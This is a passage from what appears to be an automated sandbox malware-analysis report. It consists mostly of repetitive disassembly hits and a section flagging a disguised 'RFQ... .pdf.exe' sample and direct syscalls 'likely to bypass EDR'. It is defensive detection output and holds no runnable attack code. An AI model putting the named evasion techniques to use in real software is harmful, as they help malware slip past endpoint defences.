                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0114A6C7 mov eax, dword ptr fs:[00000030h]5_2_0114A6C7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011906F1 mov eax, dword ptr fs:[00000030h]5_2_011906F1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011906F1 mov eax, dword ptr fs:[00000030h]5_2_011906F1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0118E6F2 mov eax, dword ptr fs:[00000030h]5_2_0118E6F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0118E6F2 mov eax, dword ptr fs:[00000030h]5_2_0118E6F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0118E6F2 mov eax, dword ptr fs:[00000030h]5_2_0118E6F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0118E6F2 mov eax, dword ptr fs:[00000030h]5_2_0118E6F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01108918 mov eax, dword ptr fs:[00000030h]5_2_01108918
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01108918 mov eax, dword ptr fs:[00000030h]5_2_01108918
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0119C912 mov eax, dword ptr fs:[00000030h]5_2_0119C912
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0118E908 mov eax, dword ptr fs:[00000030h]5_2_0118E908
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0118E908 mov eax, dword ptr fs:[00000030h]5_2_0118E908
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011A892B mov eax, dword ptr fs:[00000030h]5_2_011A892B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0119892A mov eax, dword ptr fs:[00000030h]5_2_0119892A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011E4940 mov eax, dword ptr fs:[00000030h]5_2_011E4940
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01190946 mov eax, dword ptr fs:[00000030h]5_2_01190946
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011B4978 mov eax, dword ptr fs:[00000030h]5_2_011B4978
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011B4978 mov eax, dword ptr fs:[00000030h]5_2_011B4978
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0119C97C mov eax, dword ptr fs:[00000030h]5_2_0119C97C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01136962 mov eax, dword ptr fs:[00000030h]5_2_01136962
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01136962 mov eax, dword ptr fs:[00000030h]5_2_01136962
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01136962 mov eax, dword ptr fs:[00000030h]5_2_01136962
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0115096E mov eax, dword ptr fs:[00000030h]5_2_0115096E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0115096E mov edx, dword ptr fs:[00000030h]5_2_0115096E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0115096E mov eax, dword ptr fs:[00000030h]5_2_0115096E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011989B3 mov esi, dword ptr fs:[00000030h]5_2_011989B3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011989B3 mov eax, dword ptr fs:[00000030h]5_2_011989B3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011989B3 mov eax, dword ptr fs:[00000030h]5_2_011989B3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011229A0 mov eax, dword ptr fs:[00000030h]5_2_011229A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011229A0 mov eax, dword ptr fs:[00000030h]5_2_011229A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011229A0 mov eax, dword ptr fs:[00000030h]5_2_011229A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011229A0 mov eax, dword ptr fs:[00000030h]5_2_011229A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011229A0 mov eax, dword ptr fs:[00000030h]5_2_011229A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011229A0 mov eax, dword ptr fs:[00000030h]5_2_011229A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011229A0 mov eax, dword ptr fs:[00000030h]5_2_011229A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011229A0 mov eax, dword ptr fs:[00000030h]5_2_011229A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011229A0 mov eax, dword ptr fs:[00000030h]5_2_011229A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011229A0 mov eax, dword ptr fs:[00000030h]5_2_011229A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011229A0 mov eax, dword ptr fs:[00000030h]5_2_011229A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011229A0 mov eax, dword ptr fs:[00000030h]5_2_011229A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011229A0 mov eax, dword ptr fs:[00000030h]5_2_011229A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011109AD mov eax, dword ptr fs:[00000030h]5_2_011109AD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011109AD mov eax, dword ptr fs:[00000030h]5_2_011109AD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0111A9D0 mov eax, dword ptr fs:[00000030h]5_2_0111A9D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0111A9D0 mov eax, dword ptr fs:[00000030h]5_2_0111A9D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0111A9D0 mov eax, dword ptr fs:[00000030h]5_2_0111A9D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0111A9D0 mov eax, dword ptr fs:[00000030h]5_2_0111A9D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0111A9D0 mov eax, dword ptr fs:[00000030h]5_2_0111A9D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0111A9D0 mov eax, dword ptr fs:[00000030h]5_2_0111A9D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011449D0 mov eax, dword ptr fs:[00000030h]5_2_011449D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011DA9D3 mov eax, dword ptr fs:[00000030h]5_2_011DA9D3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011A69C0 mov eax, dword ptr fs:[00000030h]5_2_011A69C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011429F9 mov eax, dword ptr fs:[00000030h]5_2_011429F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011429F9 mov eax, dword ptr fs:[00000030h]5_2_011429F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0119E9E0 mov eax, dword ptr fs:[00000030h]5_2_0119E9E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0119C810 mov eax, dword ptr fs:[00000030h]5_2_0119C810
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011B483A mov eax, dword ptr fs:[00000030h]5_2_011B483A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011B483A mov eax, dword ptr fs:[00000030h]5_2_011B483A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0114A830 mov eax, dword ptr fs:[00000030h]5_2_0114A830
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01132835 mov eax, dword ptr fs:[00000030h]5_2_01132835
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01132835 mov eax, dword ptr fs:[00000030h]5_2_01132835
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01132835 mov eax, dword ptr fs:[00000030h]5_2_01132835
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01132835 mov ecx, dword ptr fs:[00000030h]5_2_01132835
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01132835 mov eax, dword ptr fs:[00000030h]5_2_01132835
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01132835 mov eax, dword ptr fs:[00000030h]5_2_01132835
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01140854 mov eax, dword ptr fs:[00000030h]5_2_01140854
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01114859 mov eax, dword ptr fs:[00000030h]5_2_01114859
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01114859 mov eax, dword ptr fs:[00000030h]5_2_01114859
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01122840 mov ecx, dword ptr fs:[00000030h]5_2_01122840
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011A6870 mov eax, dword ptr fs:[00000030h]5_2_011A6870
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011A6870 mov eax, dword ptr fs:[00000030h]5_2_011A6870
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0119E872 mov eax, dword ptr fs:[00000030h]5_2_0119E872
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0119E872 mov eax, dword ptr fs:[00000030h]5_2_0119E872
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0119C89D mov eax, dword ptr fs:[00000030h]5_2_0119C89D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01110887 mov eax, dword ptr fs:[00000030h]5_2_01110887
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0113E8C0 mov eax, dword ptr fs:[00000030h]5_2_0113E8C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011E08C0 mov eax, dword ptr fs:[00000030h]5_2_011E08C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0114C8F9 mov eax, dword ptr fs:[00000030h]5_2_0114C8F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0114C8F9 mov eax, dword ptr fs:[00000030h]5_2_0114C8F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011DA8E4 mov eax, dword ptr fs:[00000030h]5_2_011DA8E4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0118EB1D mov eax, dword ptr fs:[00000030h]5_2_0118EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0118EB1D mov eax, dword ptr fs:[00000030h]5_2_0118EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0118EB1D mov eax, dword ptr fs:[00000030h]5_2_0118EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0118EB1D mov eax, dword ptr fs:[00000030h]5_2_0118EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0118EB1D mov eax, dword ptr fs:[00000030h]5_2_0118EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0118EB1D mov eax, dword ptr fs:[00000030h]5_2_0118EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0118EB1D mov eax, dword ptr fs:[00000030h]5_2_0118EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0118EB1D mov eax, dword ptr fs:[00000030h]5_2_0118EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0118EB1D mov eax, dword ptr fs:[00000030h]5_2_0118EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011E4B00 mov eax, dword ptr fs:[00000030h]5_2_011E4B00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0113EB20 mov eax, dword ptr fs:[00000030h]5_2_0113EB20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0113EB20 mov eax, dword ptr fs:[00000030h]5_2_0113EB20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011D8B28 mov eax, dword ptr fs:[00000030h]5_2_011D8B28
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011D8B28 mov eax, dword ptr fs:[00000030h]5_2_011D8B28
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01108B50 mov eax, dword ptr fs:[00000030h]5_2_01108B50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011E2B57 mov eax, dword ptr fs:[00000030h]5_2_011E2B57
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011E2B57 mov eax, dword ptr fs:[00000030h]5_2_011E2B57
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011E2B57 mov eax, dword ptr fs:[00000030h]5_2_011E2B57
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011E2B57 mov eax, dword ptr fs:[00000030h]5_2_011E2B57
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011BEB50 mov eax, dword ptr fs:[00000030h]5_2_011BEB50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011C4B4B mov eax, dword ptr fs:[00000030h]5_2_011C4B4B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011C4B4B mov eax, dword ptr fs:[00000030h]5_2_011C4B4B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011B8B42 mov eax, dword ptr fs:[00000030h]5_2_011B8B42
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011A6B40 mov eax, dword ptr fs:[00000030h]5_2_011A6B40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011A6B40 mov eax, dword ptr fs:[00000030h]5_2_011A6B40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011DAB40 mov eax, dword ptr fs:[00000030h]5_2_011DAB40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0110CB7E mov eax, dword ptr fs:[00000030h]5_2_0110CB7E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01120BBE mov eax, dword ptr fs:[00000030h]5_2_01120BBE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01120BBE mov eax, dword ptr fs:[00000030h]5_2_01120BBE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011C4BB0 mov eax, dword ptr fs:[00000030h]5_2_011C4BB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011C4BB0 mov eax, dword ptr fs:[00000030h]5_2_011C4BB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011BEBD0 mov eax, dword ptr fs:[00000030h]5_2_011BEBD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01130BCB mov eax, dword ptr fs:[00000030h]5_2_01130BCB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01130BCB mov eax, dword ptr fs:[00000030h]5_2_01130BCB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01130BCB mov eax, dword ptr fs:[00000030h]5_2_01130BCB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01110BCD mov eax, dword ptr fs:[00000030h]5_2_01110BCD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01110BCD mov eax, dword ptr fs:[00000030h]5_2_01110BCD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01110BCD mov eax, dword ptr fs:[00000030h]5_2_01110BCD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01118BF0 mov eax, dword ptr fs:[00000030h]5_2_01118BF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01118BF0 mov eax, dword ptr fs:[00000030h]5_2_01118BF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01118BF0 mov eax, dword ptr fs:[00000030h]5_2_01118BF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0119CBF0 mov eax, dword ptr fs:[00000030h]5_2_0119CBF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0113EBFC mov eax, dword ptr fs:[00000030h]5_2_0113EBFC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0119CA11 mov eax, dword ptr fs:[00000030h]5_2_0119CA11
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01134A35 mov eax, dword ptr fs:[00000030h]5_2_01134A35
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01134A35 mov eax, dword ptr fs:[00000030h]5_2_01134A35
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0114CA24 mov eax, dword ptr fs:[00000030h]5_2_0114CA24
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0113EA2E mov eax, dword ptr fs:[00000030h]5_2_0113EA2E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01116A50 mov eax, dword ptr fs:[00000030h]5_2_01116A50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01116A50 mov eax, dword ptr fs:[00000030h]5_2_01116A50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01116A50 mov eax, dword ptr fs:[00000030h]5_2_01116A50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01116A50 mov eax, dword ptr fs:[00000030h]5_2_01116A50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01116A50 mov eax, dword ptr fs:[00000030h]5_2_01116A50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01116A50 mov eax, dword ptr fs:[00000030h]5_2_01116A50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01116A50 mov eax, dword ptr fs:[00000030h]5_2_01116A50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01120A5B mov eax, dword ptr fs:[00000030h]5_2_01120A5B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01120A5B mov eax, dword ptr fs:[00000030h]5_2_01120A5B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0118CA72 mov eax, dword ptr fs:[00000030h]5_2_0118CA72
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0118CA72 mov eax, dword ptr fs:[00000030h]5_2_0118CA72
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0114CA6F mov eax, dword ptr fs:[00000030h]5_2_0114CA6F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0114CA6F mov eax, dword ptr fs:[00000030h]5_2_0114CA6F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0114CA6F mov eax, dword ptr fs:[00000030h]5_2_0114CA6F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011BEA60 mov eax, dword ptr fs:[00000030h]5_2_011BEA60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01148A90 mov edx, dword ptr fs:[00000030h]5_2_01148A90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0111EA80 mov eax, dword ptr fs:[00000030h]5_2_0111EA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0111EA80 mov eax, dword ptr fs:[00000030h]5_2_0111EA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0111EA80 mov eax, dword ptr fs:[00000030h]5_2_0111EA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0111EA80 mov eax, dword ptr fs:[00000030h]5_2_0111EA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0111EA80 mov eax, dword ptr fs:[00000030h]5_2_0111EA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0111EA80 mov eax, dword ptr fs:[00000030h]5_2_0111EA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0111EA80 mov eax, dword ptr fs:[00000030h]5_2_0111EA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0111EA80 mov eax, dword ptr fs:[00000030h]5_2_0111EA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0111EA80 mov eax, dword ptr fs:[00000030h]5_2_0111EA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011E4A80 mov eax, dword ptr fs:[00000030h]5_2_011E4A80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01118AA0 mov eax, dword ptr fs:[00000030h]5_2_01118AA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01118AA0 mov eax, dword ptr fs:[00000030h]5_2_01118AA0
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Found direct / indirect Syscall (likely to bypass EDR)
                Source: C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exeNtWriteVirtualMemory: Direct from: 0x76F0490CJump to behavior
                Source: C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exeNtAllocateVirtualMemory: Direct from: 0x76F03C9CJump to behavior
                Source: C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exeNtClose: Direct from: 0x76F02B6C
                Source: C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exeNtReadVirtualMemory: Direct from: 0x76F02E8CJump to behavior
                Source: C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exeNtCreateKey: Direct from: 0x76F02C6CJump to behavior
                Source: C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exeNtSetInformationThread: Direct from: 0x76F02B4CJump to behavior
                Source: C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exeNtQueryAttributesFile: Direct from: 0x76F02E6CJump to behavior
                Source: C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exeNtAllocateVirtualMemory: Direct from: 0x76F048ECJump to behavior
                Source: C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exeNtQuerySystemInformation: Direct from: 0x76F048CCJump to behavior
                Source: C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2CJump to behavior
                Source: C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exeNtOpenSection: Direct from: 0x76F02E0CJump to behavior
                Source: C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exeNtSetInformationThread: Direct from: 0x76EF63F9Jump to behavior
                Source: C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exeNtDeviceIoControlFile: Direct from: 0x76F02AECJump to behavior
                Source: C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exeNtAllocateVirtualMemory: Direct from: 0x76F02BECJump to behavior
                Source: C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exeNtCreateFile: Direct from: 0x76F02FECJump to behavior
                Source: C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exeNtOpenFile: Direct from: 0x76F02DCCJump to behavior
                Source: C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exeNtQueryInformationToken: Direct from: 0x76F02CACJump to behavior
